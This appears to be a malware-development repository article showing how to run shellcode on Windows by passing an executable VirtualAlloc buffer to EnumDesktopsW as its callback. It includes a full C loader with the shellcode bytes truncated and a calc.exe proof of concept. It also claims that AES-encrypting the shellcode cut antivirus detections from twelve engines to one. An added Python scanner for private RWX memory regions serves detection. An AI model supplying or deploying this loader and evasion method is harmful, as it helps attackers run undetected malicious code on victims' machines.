Malforge-Maldev-Public-Organization/Executing-Code-via-EnumDesktopsW-Callback

This repository demonstrates how to execute shellcode on a Windows machine using the `EnumDesktopsW` callback mechanism. It leverages memory allocation, shellcode injection, and callback execution for proof-of-concept.

Execute Code via EnumDesktopsW Callback

Introduction

Welcome to this article! Today, I’ll demonstrate how you can execute shellcode on a Windows machine using the EnumDesktopsW callback function — a straightforward and effective technique.

What is EnumDesktopsW?

The EnumDesktopsW function is part of the Windows API (user32) and is used to enumerate the desktops associated with a window station. It takes a DESKTOPENUMPROCW callback pointer that it invokes once for each desktop. The function itself is benign and widely used, but because it calls whatever function pointer it is given, it can be abused as part of a broader strategy to transfer execution to attacker-controlled memory.

How Can It Be Used to Execute Shellcode?

Shellcode is a compact sequence of instructions used to perform specific tasks, often malicious in nature. Here’s how EnumDesktopsW can be leveraged to execute shellcode:

  1. Memory Allocation: Allocate a memory region in the process using a function like VirtualAlloc.
  2. Copy Shellcode: Copy the shellcode into the allocated memory region.
  3. Execute Shellcode: Use EnumDesktopsW to execute the shellcode via a callback function pointer, typically by casting it to a DESKTOPENUMPROCW type.

Code Example

#include <windows.h>
#include <stdio.h>
#include <string.h>

int main(void) {
    char shellcode[] = "..."; // truncated for brevity

    // Step 1: a committed, private RWX region large enough for the shellcode
    LPVOID pAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (pAlloc == NULL) {
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    // Step 2: copy the shellcode into that region
    memcpy(pAlloc, shellcode, sizeof(shellcode));
    // Step 3: EnumDesktopsW invokes the "callback" once per desktop in the window station
    EnumDesktopsW(GetProcessWindowStation(), (DESKTOPENUMPROCW) pAlloc, 0);
    printf("%lu\n", GetLastError());
    VirtualFree(pAlloc, 0, MEM_RELEASE);
    return 0;
}

This example works as follows:

  • VirtualAlloc: Allocates executable memory.
  • memcpy: Copies the shellcode into the memory region.
  • EnumDesktopsW: Executes the shellcode using the callback.
  • VirtualFree: Frees the memory after use.

Proof of Concept

The shellcode in this example spawns the Windows Calculator (calc.exe). When executed, the code should successfully launch the calculator.

Detection

When uploaded to AntiScan.me, the raw shellcode was detected by 12 antivirus engines.

However, after encrypting the shellcode using AES (e.g., with msfvenom), only one AV (Ahnlab V3) detected it.
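Signature scanning of the shellcode bytes is what the encryption above defeats; the allocation in step 1 of the loader is harder to hide, because it leaves a committed, private, writable and executable region in the process. The following triage scanner is added here as an example and is not part of this repository: it walks a process with VirtualQueryEx and lists such regions. The names classify_region and scan_rwx_private_regions are assumed; the module imports on any platform, but the scan itself only runs on Windows.

```python
import ctypes
import sys

# Win32 constants (winnt.h / memoryapi.h)
MEM_COMMIT, MEM_PRIVATE = 0x1000, 0x20000
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
PROCESS_QUERY_INFORMATION, PROCESS_VM_READ = 0x0400, 0x0010


class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    # Layout from memoryapi.h; fixed-width types so the module also imports on Linux
    _fields_ = [("BaseAddress", ctypes.c_void_p), ("AllocationBase", ctypes.c_void_p),
                ("AllocationProtect", ctypes.c_uint32), ("RegionSize", ctypes.c_size_t),
                ("State", ctypes.c_uint32), ("Protect", ctypes.c_uint32),
                ("Type", ctypes.c_uint32)]


def classify_region(state, protect, mem_type):
    """True for a committed, private region that is writable *and* executable:
    the shape VirtualAlloc(MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    plus memcpy leaves behind. Module code lives in MEM_IMAGE regions, which
    are ignored here, so hits in an ordinary process are rare and worth a look."""
    return (state == MEM_COMMIT and mem_type == MEM_PRIVATE
            and protect in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY))


def scan_rwx_private_regions(pid):
    """Walk a process with VirtualQueryEx and return (base, size) for every
    region classify_region() flags. Needs Windows and query rights on the target."""
    if sys.platform != "win32":
        raise OSError("VirtualQueryEx is only available on Windows")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32]
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.VirtualQueryEx.argtypes = [ctypes.c_void_p, ctypes.c_void_p,
                                   ctypes.POINTER(MEMORY_BASIC_INFORMATION), ctypes.c_size_t]
    k32.VirtualQueryEx.restype = ctypes.c_size_t
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    h = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, pid)
    if not h:
        raise ctypes.WinError(ctypes.get_last_error())
    hits, addr, mbi = [], 0, MEMORY_BASIC_INFORMATION()
    try:
        # VirtualQueryEx returns 0 once addr passes the end of user address space
        while k32.VirtualQueryEx(h, addr, ctypes.byref(mbi), ctypes.sizeof(mbi)):
            if classify_region(mbi.State, mbi.Protect, mbi.Type):
                hits.append((mbi.BaseAddress or 0, mbi.RegionSize))
            addr = (mbi.BaseAddress or 0) + mbi.RegionSize
    finally:
        k32.CloseHandle(h)
    return hits
```

Run it against a process that has executed the loader above and the region from step 1 shows up as a hit; a region with PAGE_READWRITE that is later flipped to execute-only would not, so treat this as one indicator rather than a complete check.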

Conclusion

That’s all it takes to execute shellcode on a Windows machine using the EnumDesktopsW API. I hope you found this article useful — stay tuned for more content!
